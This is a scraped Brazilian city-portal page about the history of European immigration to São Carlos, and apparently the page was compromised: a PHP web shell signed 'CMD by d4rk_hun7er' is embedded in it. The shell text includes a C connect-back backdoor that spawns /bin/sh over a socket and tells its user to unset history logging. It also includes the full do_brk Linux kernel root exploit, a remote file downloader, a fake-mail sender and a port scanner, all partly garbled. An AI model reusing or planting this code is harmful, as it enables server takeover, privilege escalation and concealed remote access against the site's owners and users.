Quinta-Feira
28 de Março de 2024
 
 
  O quê procura? 
Usuário:  
Senha:  
esqueceu os dados?
cadastre-se gratuitamente
Pensamento
do dia:
"Fazer dinheiro é arte, trabalhar é arte, e bons negócios são a melhor arte de todas."
(Andy Warhol)
  Inicial
  A Cidade
  Turismo
  
  NOTÍCIAS
  CONCURSOS
  SAÚDE
  ESPORTES
  CANAL JURÍDICO
  DIÁRIO OFICIAL
  ATAS CÂMARA
  FALECIMENTOS
  AGENDA
  
  Classificados
  Empresas/Serviços
  
  Telefone/Operadora
  
  CEP - superCEP
  Colunistas
  Culinária
  Diversão & Lazer
  Pensamentos
  Piadas
  Telefones
  Torpedos





publicidade




publicidade




publicidade




publicidade




publicidade


Guia de
Empresas
e Serviços

cadastre
grátis

A CidadeHistória da Cidade /
A 'Piccola Itália'

Os primeiros imigrantes chegaram a São Carlos em 1876. Em 1886, os imigrantes já eram 1/8 da população, a segunda taxa mais alta de imigrantes no Estado.

Foram três as correntes migratórias: a espanhola, a portuguesa, e a italiana.

A colônia espanhola era muito organizada e com espírito associativo, graças à "Real Sociedad Española Beneficente y Instructiva", fundada em 1896. A sociedade construiu prédio próprio, que ainda existe, sendo doado à Sociedade de São Vicente de Paulo pelos últimos membros da colônia.

Os portugueses sempre foram em maior número em São Carlos, tendo representação consular ou vice-consular até os dias de hoje.

Mas a mais poderosa corrente migratória foi a italiana. Já em 1882 havia uma associação de proteção aos colonos italianos.

Os primeiros imigrantes vieram do sul da Itália, e os primeiros a se unirem em sindicatos. Vieram então os italianos do Norte e Nordeste e fundaram a "Societá Dante Alighieri", construindo prédio próprio (a Casa D"Itália, que seria anos mais tarde o primeiro prédio da Escola de Engenharia), no qual foi mantida uma escola para os filhos dos italianos, alcançando fama e eficiência, desaparecendo somente durante a perseguição aos descendentes italianos devido à Segunda Guerra Mundial.

 

 

 /

CMD by d4rk_hun7er

/ **

*.: Changing The Rules :.*

*

*

*INFORMAÇÕES DO SISTEMA:

 

*

:

Script Current User:

PHP Version:

User Info: uid() euid() gid()

Current Path:

Server IP:

Web Server:

 

*

"; ?> *

*Prompt de Comando*

*&1"); $output = ob_get_contents(); ob_end_clean( ); ?> <?php if

(!empty($output)) echo str_replace(">", ">", str_replace("<", "<",

$output)); ?>

[*] Safemode Mode Run"; ?> *

*Safe Mode Directory Listing*

*"; echo ""; echo ""; echo "*List All Files*

 

"; while (($file = readdir($dir)) !== false) { if (@is_file($file)) {

$file1 = fileowner($file); $file2 = fileperms($file); echo "$file1 -

$file2 - $file <$SCRIPT_NAME?$QUERY_STRING&see=$file>

"; // echo "$file1 - $file2 - $file

"; flush( ); } } echo ""; echo""; echo "*List Only Folders*

 

"; if ($dir = @opendir($chdir)) { while (($file = readdir($dir)) !==

false) { if (@is_dir($file)) { $file1 = fileowner($file); $file2 =

fileperms($file); echo "$file1 - $file2 - $file

<$SCRIPT_NAME?$QUERY_STRING&chdir=$chdir/$file>

"; // echo "$file1 - $file2 - $file

"; } } } echo ""; echo""; echo "*List Writable Folders*

 

"; if ($dir = @opendir($chdir)) { while (($file = readdir($dir)) !==

false) { if (@is_writable($file) && @is_dir($file)) { $file1 =

fileowner($file); $file2 = fileperms($file); echo "$file1 - $file2 - $file

"; } } } echo ""; echo ""; echo ""; echo "*List Writable Files*

 

"; if ($dir = opendir($chdir)) { while (($file = readdir($dir)) !==

false) { if (@is_writable($file) && @is_file($file)) { $file1 =

fileowner($file); $file2 = fileperms($file); echo "$file1 - $file2 - $file

"; } } } echo ""; echo ""; echo ""; } } ?> " . "#include " .

"#include " . "#include " . "#include " . "int main(int argc, char

**argv) { " . " char *host; " . " int port = 80; " . " int f; " . "

int l; " . " int sock; " . " struct in_addr ia; " . " struct

sockaddr_in sin, from; " . " struct hostent *he; " . " char msg[ ] =

"Welcome to Data Cha0s Connect Back Shell\n\n" " . " "Issue

\"export TERM=xterm; exec bash -i\"\n" " . " "For More Reliable

Shell.\n" " . " "Issue \"unset HISTFILE; unset

SAVEHIST\"\n" " . " "For Not Getting Logged.\n(;\n\n"; " . "

printf("Data Cha0s Connect Back Backdoor\n\n"); " . " if (argc < 2

|| argc > 3) { " . " printf("Usage: %s [Host] \n", argv[0]); " . "

return 1; " . " } " . " printf("[*] Dumping Arguments\n"); " . " l

= strlen(argv[1]); " . " if (l <= 0) { " . " printf("[-] Invalid Host

Name\n"); " . " return 1; " . " } " . " if (!(host = (char *)

malloc(l))) { " . " printf("[-] Unable to Allocate Memory\n"); " .

" return 1; " . " } " . " strncpy(host, argv[1], l); " . " if (argc

== 3) { " . " port = atoi(argv[2]); " . " if (port <= 0 || port >

65535) { " . " printf("[-] Invalid Port Number\n"); " . " return

1; " . " } " . " } " . " printf("[*] Resolving Host Name\n"); " .

" he = gethostbyname(host); " . " if (he) { " . " memcpy(&ia.s_addr,

he->h_addr, 4); " . " } else if ((ia.s_addr = inet_addr(host)) ==

INADDR_ANY) { " . " printf("[-] Unable to Resolve: %s\n", host); "

. " return 1; " . " } " . " sin.sin_family = PF_INET; " . "

sin.sin_addr.s_addr = ia.s_addr; " . " sin.sin_port = htons(port); " .

" printf("[*] Connecting...\n"); " . " if ((sock = socket(AF_INET,

SOCK_STREAM, 0)) == -1) { " . " printf("[-] Socket Error\n"); " . "

return 1; " . " } " . " if (connect(sock, (struct sockaddr *)&sin,

sizeof(sin)) != 0) { " . " printf("[-] Unable to Connect\n"); " . "

return 1; " . " } " . " printf("[*] Spawning Shell\n"); " . " f =

fork( ); " . " if (f < 0) { " . " printf("[-] Unable to

Fork\n"); " . " return 1; " . " } else if (!f) { " . " write(sock,

msg, sizeof(msg)); " . " dup2(sock, 0); " . " dup2(sock, 1); " . "

dup2(sock, 2); " . " execl("/bin/sh", "shell", NULL); " . "

close(sock); " . " return 0; " . " } " . " printf("[*]

Detached\n\n"); " . " return 0; " . "} "; $fp =

fopen("/tmp/dc-connectback.c", "w"); $ok = fwrite($fp, $shell); if

(!empty($ok)) { echo "*

*[*] Connect Back Shell Was Successfuly Copied*

*"; } else { echo "*

*[-] An Error Has Ocurred While Copying Shell*

*"; } } if ($kernel == "write") { $kernel = "/* " . " *

hatorihanzo.c " . " * Linux kernel do_brk vma overflow exploit. " . "

* " . " * The bug was found by Paul (IhaQueR) Starzetz " . " * " . "

* Further research and exploit development by " . " * Wojciech

Purczynski and Paul Starzetz. " . " * " . " * (c) 2003 Copyright by

IhaQueR and cliph. All Rights Reserved. " . " * " . " * COPYING,

PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE " . " *

OF PRESENTED CODE IS STRICTLY PROHIBITED. " . "*/ " . "#define

_GNU_SOURCE " . "#include " . "#include " . "#include " .

"#include " . "#include " . "#include " . "#include " .

"#include " . "#include " . "#include " . "#include " .

"#include " . "#include " . "#include " . "#include " .

"#include " . "#include " . "#include " . "#include " .

"#include " . "#include " . "#define kB * 1024 " . "#define MB *

1024 kB " . "#define GB * 1024 MB " . "#define MAGIC 0xdefaced /* I

should've patented this number -cliph */ " . "#define ENTRY_MAGIC 0 "

. "#define ENTRY_GATE 2 " . "#define ENTRY_CS 4 " . "#define ENTRY_DS

6 " . "#define CS ((ENTRY_CS << 2) | 4) " . "#define DS ((ENTRY_DS <<

2) | 4) " . "#define GATE ((ENTRY_GATE << 2) | 4 | 3) " . "#define

LDT_PAGES ((LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1) / PAGE_SIZE) " .

"#define TOP_ADDR 0xFFFFE000U " . "/* configuration */ " . "unsigned

task_size; " . "unsigned page; " . "uid_t uid; " . "unsigned

address; " . "int dontexit = 0; " . "void fatal(char * msg) " . "{ "

. " fprintf(stderr, "[-] %s: %s\n", msg, strerror(errno)); " . " if

(dontexit) { " . " fprintf(stderr, "[-] Unable to exit, entering

neverending loop.\n"); " . " kill(getpid(), SIGSTOP); " . " for (;;)

pause(); " . " } " . " exit(EXIT_FAILURE); " . "} " . "void

configure(void) " . "{ " . " unsigned val; " . " task_size =

((unsigned)&val + 1 GB ) / (1 GB) * 1 GB; " . " uid = getuid(); " .

"} " . "void expand(void) " . "{ " . " unsigned top = (unsigned)

sbrk(0); " . " unsigned limit = address + PAGE_SIZE; " . " do { " . "

if (sbrk(PAGE_SIZE) == NULL) " . " fatal("Kernel seems not to be

vulnerable"); " . " dontexit = 1; " . " top += PAGE_SIZE; " . " }

while (top < limit); " . "} " . "jmp_buf jmp; " . "#define MAP_NOPAGE

1 " . "#define MAP_ISPAGE 2 " . "void sigsegv(int signo, siginfo_t *

si, void * ptr) " . "{ " . " struct ucontext * uc = (struct ucontext

*) ptr; " . " int error_code = uc->uc_mcontext.gregs[REG_ERR]; " . "

(void)signo; " . " (void)si; " . " error_code = MAP_NOPAGE +

(error_code & 1); " . " longjmp(jmp, error_code); " . "} " . "void

prepare(void) " . "{ " . " struct sigaction sa; " . " sa.sa_sigaction

= sigsegv; " . " sa.sa_flags = SA_SIGINFO | SA_NOMASK; " . "

sigemptyset(&sa.sa_mask); " . " sigaction(SIGSEGV, &sa, NULL); " .

"} " . "int testaddr(unsigned addr) " . "{ " . " int val; " . " val

= setjmp(jmp); " . " if (val == 0) { " . " asm ("verr (%%eax)" : :

"a" (addr)); " . " return MAP_ISPAGE; " . " } " . " return val; "

. "} " . "#define map_pages (((TOP_ADDR - task_size) + PAGE_SIZE - 1) /

PAGE_SIZE) " . "#define map_size (map_pages + 8*sizeof(unsigned) - 1) /

(8*sizeof(unsigned)) " . "#define next(u, b) do { if ((b = 2*b) == 0) {

b = 1; u++; } } while(0) " . "void map(unsigned * map) " . "{ " . "

unsigned addr = task_size; " . " unsigned bit = 1; " . " prepare(); "

. " while (addr < TOP_ADDR) { " . " if (testaddr(addr) ==

MAP_ISPAGE) " . " *map |= bit; " . " addr += PAGE_SIZE; " . "

next(map, bit); " . " } " . " signal(SIGSEGV, SIG_DFL); " . "} " .

"void find(unsigned * m) " . "{ " . " unsigned addr = task_size; " .

" unsigned bit = 1; " . " unsigned count; " . " unsigned tmp; " . "

prepare(); " . " tmp = address = count = 0U; " . " while (addr <

TOP_ADDR) { " . " int val = testaddr(addr); " . " if (val ==

MAP_ISPAGE && (*m & bit) == 0) { " . " if (!tmp) tmp = addr; " . "

count++; " . " } else { " . " if (tmp && count == LDT_PAGES) { " . "

errno = EAGAIN; " . " if (address) " . " fatal("double

allocation\n"); " . " address = tmp; " . " } " . " tmp = count =

0U; " . " } " . " addr += PAGE_SIZE; " . " next(m, bit); " . " } "

. " signal(SIGSEGV, SIG_DFL); " . " if (address) " . " return; " . "

errno = ENOTSUP; " . " fatal("Unable to determine kernel

address"); " . "} " . "int modify_ldt(int, void *, unsigned); " .

"void ldt(unsigned * m) " . "{ " . " struct modify_ldt_ldt_s l; " . "

map(m); " . " memset(&l, 0, sizeof(l)); " . " l.entry_number =

LDT_ENTRIES - 1; " . " l.seg_32bit = 1; " . " l.base_addr = MAGIC >>

16; " . " l.limit = MAGIC & 0xffff; " . " if (modify_ldt(1, &l,

sizeof(l)) == -1) " . " fatal("Unable to set up LDT"); " . "

l.entry_number = ENTRY_MAGIC / 2; " . " if (modify_ldt(1, &l,

sizeof(l)) == -1) " . " fatal("Unable to set up LDT"); " . "

find(m); " . "} " . "asmlinkage void kernel(unsigned * task) " .

"{ " . " unsigned * addr = task; " . " /* looking for uids */ " . "

while (addr[0] != uid || addr[1] != uid || " . " addr[2] != uid ||

addr[3] != uid) " . " addr++; " . " addr[0] = addr[1] = addr[2] =

addr[3] = 0; /* uids */ " . " addr[4] = addr[5] = addr[6] = addr[7] =

0; /* uids */ " . " addr[8] = 0; " . " /* looking for vma */ " . "

for (addr = (unsigned *) task_size; addr; addr++) { " . " if (addr[0]

>= task_size && addr[1] < task_size && " . " addr[2] == address &&

addr[3] >= task_size) { " . " addr[2] = task_size - PAGE_SIZE; " . "

addr = (unsigned *) addr[3]; " . " addr[1] = task_size - PAGE_SIZE; "

. " addr[2] = task_size; " . " break; " . " } " . " } " . "} " .

"void kcode(void); " . "#define __str(s) #s " . "#define str(s)

__str(s) " . "void __kcode(void) " . "{ " . " asm( " . " "kcode:

\n" " . " " pusha \n" " . " " pushl %es \n" " . " " pushl

%ds \n" " . " " movl $(" str(DS) ") ,%edx \n" " . " " movl

%edx,%es \n" " . " " movl %edx,%ds \n" " . " " movl

$0xffffe000,%eax \n" " . " " andl %esp,%eax \n" " . " " pushl

%eax \n" " . " " call kernel \n" " . " " addl $4, %esp \n" "

. " " popl %ds \n" " . " " popl %es \n" " . " " popa \n" " .

" " lret \n" " . " ); " . "} " . "void knockout(void) " . "{ " .

" unsigned * addr = (unsigned *) address; " . " if (mprotect(addr,

PAGE_SIZE, PROT_READ|PROT_WRITE) == -1) " . " fatal("Unable to change

page protection"); " . " errno = ESRCH; " . " if (addr[ENTRY_MAGIC]

!= MAGIC) " . " fatal("Invalid LDT entry"); " . " /* setting call

gate and privileged descriptors */ " . " addr[ENTRY_GATE+0] =

((unsigned)CS << 16) | ((unsigned)kcode & 0xffffU); " . "

addr[ENTRY_GATE+1] = ((unsigned)kcode & ~0xffffU) | 0xec00U; " . "

addr[ENTRY_CS+0] = 0x0000ffffU; /* kernel 4GB code at 0x00000000 */ " .

" addr[ENTRY_CS+1] = 0x00cf9a00U; " . " addr[ENTRY_DS+0] = 0x0000ffffU;

/* user 4GB code at 0x00000000 */ " . " addr[ENTRY_DS+1] =

0x00cf9200U; " . " prepare(); " . " if (setjmp(jmp) != 0) { " . "

errno = ENOEXEC; " . " fatal("Unable to jump to call gate"); " . "

} " . " asm("lcall $" str(GATE) ",$0x0"); /* this is it */ " .

"} " . "void shell(void) " . "{ " . " char * argv[] = { _PATH_BSHELL,

NULL }; " . " execve(_PATH_BSHELL, argv, environ); " . "

fatal("Unable to spawn shell\n"); " . "} " . "void remap(void) " .

"{ " . " static char stack[8 MB]; /* new stack */ " . " static char *

envp[] = { "PATH=" _PATH_STDPATH, NULL }; " . " static unsigned *

m; " . " static unsigned b; " . " m = (unsigned *) sbrk(map_size); "

. " if (!m) " . " fatal("Unable to allocate memory"); " . " environ

= envp; " . " asm ("movl %0, %%esp\n" : : "a" (stack +

sizeof(stack))); " . " b = ((unsigned)sbrk(0) + PAGE_SIZE - 1) &

PAGE_MASK; " . " if (munmap((void*)b, task_size - b) == -1) " . "

fatal("Unable to unmap stack"); " . " while (b < task_size) { " . "

if (sbrk(PAGE_SIZE) == NULL) " . " fatal("Unable to expand BSS"); "

. " b += PAGE_SIZE; " . " } " . " ldt(m); " . " expand(); " . "

knockout(); " . " shell(); " . "} " . "int main(void) " . "{ " . "

configure(); " . " remap(); " . " return EXIT_FAILURE; " . "} "; $fp

= fopen("/tmp/xpl_brk.c", "w"); $ok = fwrite($fp, $kernel); if

(!empty($ok)) { echo "*

*[*] Linux Local Kernel Exploit Was Successfuly Copied*

*"; } else { echo "*

*[-] An Error Has Ocurred While Copying Kernel Exploit*

*"; } } ?> *

 

*

";

  echo ""; 

  echo "$read"; 

  Echo ""; 

}

 

// Function to Dowload Local Xploite Binary COde or Source Code

 

if ($dx != "") {

  $fp = @fopen("$hostxpl",r);

  $fp2 = @fopen("$storage","w");

  fwrite($fp2, "");

  $fp1 = @fopen("$storage","a+");

  for (;;) {

    $read = @fread($fp, 4096);

    if (empty($read)) break;

    $ok = fwrite($fp1, $read);

    

    if (empty($ok)) {

      echo "*

*[-] An Error Has Ocurred While Uploading File*

*";

      break;

    }

  }

 

  if (!empty($ok)) {

    echo "*

*[*] File Was Successfuly Uploaded*

*";

  }

}

 

flush( );

 

// Function to visulize Format Color Source Code PHP

 

if ($sfc != "") {

  $showcode = show_source("$sfc");

  echo " $showcode ";

}

 

// Function to Visualize all infomation files

if ($fileinfo != "") {

  $infofile = stat("$fileanalize");

  while (list($info, $value) = each ($infofile)) {

    echo" Info: $info  Value: $value 

";

  }

}

 

// Function to send fake mail

if ($fake == 1) {

  echo "*

*"; echo "Your Fake Mail

"; echo "Your Cavy:

"; echo "Suject:

"; echo "Text:

"; echo "

"; echo ""; echo ""; } if($send == 1) { if (mail($cavy, $subject, $body,

"From: $yourmail ")) { echo "*

*[*] Mail Send Sucessfuly*

*"; } else { echo "*

*[-] An Error Has Ocurred While Sending Mail*

*"; } } if ($portscan != "") { $port = array

("21","22","23","25","110",); $values = count($port); for ($cont=0;

$cont < $values; $cont++) { @$sock[$cont] = Fsockopen($SERVER_NAME,

$port[$cont], $oi, $oi2, 1); $service =

Getservbyport($port[$cont],"tcp"); @$get = fgets($sock[$cont]); echo "

Port: $port[$cont] - Service: $service

 

"; echo "

Banner: $get

 

"; flush(); } } ?> *

 

*

Free Hosting Provided By: HostBigger.com <http://www.hostbigger.com> -

Made Possible By: CWIhosting.com <http://www.cwihosting.com>

Reliable Business Web Hosting and Development Services at CWI Hosting!

<http://www.cwihosting.com> *

 

 

Relação de Feriados e Pontos Facultativos
:: Eventos/Agenda
:: Mais lidas
» Publicidade





 
 

indique nosso site

adicione em seu Favoritos

defina como sua página inicial

| QUEM SOMOS | PUBLICIDADE | FALE CONOSCO | PRIVACIDADE | REGRAS |

| BLACK FRIDAY PROMOÇÕES | DIA DO CONSUMIDOR PROMOÇÕES | CYBER MONDAY PROMOÇÕES |
| BOXING DAY PROMOÇÕES | BLACK DECEMBER PROMOÇÕES |
| GERADOR DE CUPONS |

São Carlos Oficial é um serviço desenvolvido e oferecido por StrZero Soluções Digitais.

Copyright© 2024 - StrZero Soluções Digitais.
Todos direitos reservados. All rights reserved.